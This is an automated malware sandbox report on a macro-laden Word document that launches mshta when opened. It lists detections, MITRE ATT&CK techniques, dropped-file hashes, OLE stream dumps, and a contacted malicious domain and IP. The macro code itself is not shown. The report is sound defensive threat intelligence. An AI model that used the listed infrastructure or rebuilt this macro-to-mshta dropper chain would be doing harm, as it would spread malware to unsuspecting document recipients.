Windows Analysis Report enjoin,12.27.2021.doc
Overview
General Information
Detection
Score: | 64 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Process Tree |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Suspicious MSHTA Process Patterns | Show sources |
Source: | Author: Florian Roth: |
Jbx Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file | Show sources |
Source: | ReversingLabs: |
Machine Learning detection for sample | Show sources |
Source: | Joe Sandbox ML: |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | Window created: | Jump to behavior |
System Summary: |
---|
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: srn1 |
Source: | Key opened: | Jump to behavior |
Source: | OLE, VBA macro line: | |||
Source: | OLE, VBA macro: | Name: Document_Open |
Source: | OLE indicator, VBA macros: |
Source: | OLE, VBA macro line: |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | OLE indicator, Word Document stream: |
Source: | Binary or memory string: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | Initial sample: |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Stream path 'Data' entropy: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior | ||
Source: | Directory queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting12 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Email Collection1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion1 | LSASS Memory | Virtualization/Sandbox Evasion1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Remote System Discovery1 | SMB/Windows Admin Shares | Clipboard Data1 | Automated Exfiltration | Application Layer Protocol12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting12 | NTDS | File and Directory Discovery11 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | System Information Discovery14 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
44% | ReversingLabs | Document-Excel.Trojan.Valyria | ||
100% | Joe Sandbox ML |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
patelboostg.com | 45.67.229.54 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| low | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
45.67.229.54 | patelboostg.com | Moldova Republic of | 200019 | ALEXHOSTMD | false |
General Information |
---|
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 546767 |
Start date: | 31.12.2021 |
Start time: | 12:21:39 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 41s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | enjoin,12.27.2021.doc |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 20 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal64.expl.winDOC@6/13@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
12:23:17 | API Interceptor | |
12:23:19 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
45.67.229.54 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
patelboostg.com | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ALEXHOSTMD | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Windows\SysWOW64\mshta.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 204 |
Entropy (8bit): | 5.1573981743615605 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3fEjZKCezocKqD:J0+oxBeRmR9etdzRxfERez1T |
MD5: | D3EB9513A9F2DD24ECDCC38FF33CA41B |
SHA1: | 37433C7BFDB800C601FCBA6F055BD01A87D26333 |
SHA-256: | 56591A120BD1C7D012554BEFD923D1AC7BF015A53A36C2808766F74FBFDCEB64 |
SHA-512: | 67960FEEC5EDA119383B9955DBD36550CE804EF1FD01F0E4D9AFC347068CA54BE4B89913AF2CC872E25C119318CBE3E137A4965E4A5A09231AFE960C1E2B844B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | CE338FE6899778AACFC28414F2D9498B |
SHA1: | 897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1 |
SHA-256: | 4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE |
SHA-512: | 6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 895 |
Entropy (8bit): | 4.4834940523645965 |
Encrypted: | false |
SSDEEP: | 12:85Q8fKlgXg/XAlCPCHaXjBybA3DNKID3KicvbcwIb4uCN1KZ3YilMMEpxRljKNTI:85a/XTTcU3xKsheQ9l2Y3qIZVNZVu/ |
MD5: | 37BC5E9D6DDA9347C5BD2804C9FB059C |
SHA1: | 5A5E7D0C4E9738D3FB6DE26D5B88FEA2546DC688 |
SHA-256: | 798714E92BD0BBE8DB540B17CCE288A854253E7E532F1AC55A400B69A2B4A7B9 |
SHA-512: | A9BFFE7D079E2DD2D71BA2D93DA1E47270EB0AC938BD9EA93A53F679CD79B28BA662142DA909600538083A6D186A1E1AC934839772909FF5838EF4EFD972235B |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1049 |
Entropy (8bit): | 4.519696540429479 |
Encrypted: | false |
SSDEEP: | 24:8pfk/XTTc+bH7vasreQ74aADv3qIQd7Qy:8K/XTA+rzj1cwIUj |
MD5: | 4EC45AE78C344A1AA992C63F48C45D2F |
SHA1: | FE43D0005E63A7DFE0493378D77C939E3D6F4ADB |
SHA-256: | F2B4F739FF557D93A8C1EC3861A37CC956772A4B21699255DA7118BF6235CC84 |
SHA-512: | 7DDC77D37269D975BB296E01618B63D4954F5EADE2EC9354BEAAE3D652276A1AEC357F7CDA6DB6B413FFCB482A64727FB06B35523F016B32F09874A18F0B33C5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 1042 |
Entropy (8bit): | 4.557146146284994 |
Encrypted: | false |
SSDEEP: | 24:8Y/XTTctcKiyUdIB97eQ970eM2Y3qIR7m:8Y/XTAHlUqBR1970eHIFm |
MD5: | 60E200C070FDEDEB9B73EE1C547A177F |
SHA1: | 0182A6D353B4976B50771F5CCD3CA4DD12A293F9 |
SHA-256: | 480406C2706EEC9E84F6C8D6C0DEBC88C41F1BFFB05986DEE6C3544E22E8AC42 |
SHA-512: | EB36BC756CCC64FF9B82334BEBC4A559DEAE3DAAA999955EA4264825065314436D1C06DD54285ACB1098B59F6FBD8BEF4FD1930D759AFFAA2027200E76F14D14 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 149 |
Entropy (8bit): | 4.925765021076922 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlYLfzX9UAlwcXAlWCUSvngculmX1UzX9UAlmxWHRqgculv:bCHFPAkqgf9ZRqgf1 |
MD5: | 3BF4F1E7F23C02240D20AE24C8EF9AAA |
SHA1: | C5C0FDD6C3D8D7A76D4C7E4FDE645A89E7D41533 |
SHA-256: | 3A48146C4A0C943D845AE094F1FCAF679B005FD684BA0B38C0418313A63C23E8 |
SHA-512: | 92C4058FE98FF941B850CB901D38997CECB98716C0A0664897C6D7F4AC21DC0F1641E3DDBCEB77134B1EF7BFA9E4A99130172E3B67D7825D16BD680F3D71D029 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.5038355507075254 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l |
MD5: | 45B1E2B14BE6C1EFC217DCE28709F72D |
SHA1: | 64E3E91D6557D176776A498CF0776BE3679F13C3 |
SHA-256: | 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6 |
SHA-512: | 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.5038355507075254 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l |
MD5: | 45B1E2B14BE6C1EFC217DCE28709F72D |
SHA1: | 64E3E91D6557D176776A498CF0776BE3679F13C3 |
SHA-256: | 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6 |
SHA-512: | 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4060 |
Entropy (8bit): | 5.772579806586633 |
Encrypted: | false |
SSDEEP: | 96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM |
MD5: | FBDB7848F1D9945428C0101B75811195 |
SHA1: | FE31E65196E0844CD5858F893D44428AECE6A2B4 |
SHA-256: | AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A |
SHA-512: | D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.5038355507075254 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l |
MD5: | 45B1E2B14BE6C1EFC217DCE28709F72D |
SHA1: | 64E3E91D6557D176776A498CF0776BE3679F13C3 |
SHA-256: | 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6 |
SHA-512: | 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4060 |
Entropy (8bit): | 5.772579806586633 |
Encrypted: | false |
SSDEEP: | 96:gmubD4ZmjvpJN3IyP3NoEVxaOcR9+2xtIols/RWvyXqRATuh:gmywmjBrYA3OgBcRU2gjRRM |
MD5: | FBDB7848F1D9945428C0101B75811195 |
SHA1: | FE31E65196E0844CD5858F893D44428AECE6A2B4 |
SHA-256: | AEC91C78C4DC06C5BCEA7B5020C38B003FC120153D51A3ADB4F32D8000A6326A |
SHA-512: | D699D3A8123F7FCC09373F27F0A09015546ABE6BCFBEB8A75178B9EF0304F73C19BC0F27F51ED2B78A02A8CAEE89B5E268808E6C0AA981ED011FE03C573311A5 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 5.843747544208076 |
TrID: |
|
File name: | enjoin,12.27.2021.doc |
File size: | 79360 |
MD5: | 7044bd240219ec2f83b01c532e2ce5ba |
SHA1: | 745cdbc4a826c5960eef3f4a9aa307ff94e4b7fb |
SHA256: | ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0 |
SHA512: | 8467fc9f63711c8fa460f1f35d42b6528c6e285799d9a19630696dd3a12e24799370eaa6d53e075e60d579a3b4ecef035cf62aac6a1bc96130b392c3931882ee |
SSDEEP: | 768:P/MMM1tMFur3Be1l3Jeq1awypEuqjuy+uqezc1GFZIdJ6jtQlQNBOTHxPIz/tZj8:Zja8IdPhW/jTEQMiebld4Kkd6t |
File Content Preview: | ........................>.......................|...........................{.................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea2aaa4b4b4a4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "enjoin,12.27.2021.doc" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Comments: | |
Template: | |
Last Saved By: | |
Revion Number: | 2 |
Total Edit Time: | 0 |
Create Time: | 2021-12-27 11:02:00 |
Last Saved Time: | 2021-12-27 11:02:00 |
Number of Pages: | 1 |
Number of Words: | 116 |
Number of Characters: | 16118 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Category: | |
Number of Bytes: | 26624 |
Number of Lines: | 65 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Manager: | |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
Streams with VBA |
---|
VBA File Name: ThisDocument.cls, Stream Size: 2420 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/ThisDocument |
VBA File Name: | ThisDocument.cls |
Stream Size: | 2420 |
Data ASCII: | . . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . Y . $ N . . ! . . . . . . . . . . . . N . K . N . . 5 . . . . . . . . . . . . . . . . . . . . . B 4 . + : r , L . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . B 4 . + : r , L . . . . . . x . . . . . Y . $ N . . ! . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 06 00 01 00 00 54 05 00 00 e4 00 00 00 ea 01 00 00 82 05 00 00 90 05 00 00 a0 07 00 00 04 00 00 00 01 00 00 00 40 9d 90 12 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 d3 15 f5 98 59 c8 24 4e 9f 86 21 a3 de d2 ab eb 81 1c 87 c8 ad b2 15 4e 82 4b ba 4e ad 1e 35 87 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code |
---|
|
VBA File Name: main.bas, Stream Size: 1103 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/main |
VBA File Name: | main.bas |
Stream Size: | 1103 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 89 03 00 00 00 00 00 00 01 00 00 00 40 9d 65 e5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code |
---|
|
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 114 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 114 |
Entropy: | 4.42107393569 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.337221095365 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . e x p l o r e r . . . . . . . . . . . . . . . . . . . . . . . . r i p t . s h . . . . . . h . . . . . . A . . . . . . . . . . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 30 01 00 00 0f 00 00 00 01 00 00 00 80 00 00 00 02 00 00 00 88 00 00 00 0e 00 00 00 9c 00 00 00 0f 00 00 00 a8 00 00 00 04 00 00 00 b8 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 c8 00 00 00 11 00 00 00 d0 00 00 00 17 00 00 00 d8 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.475702379357 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
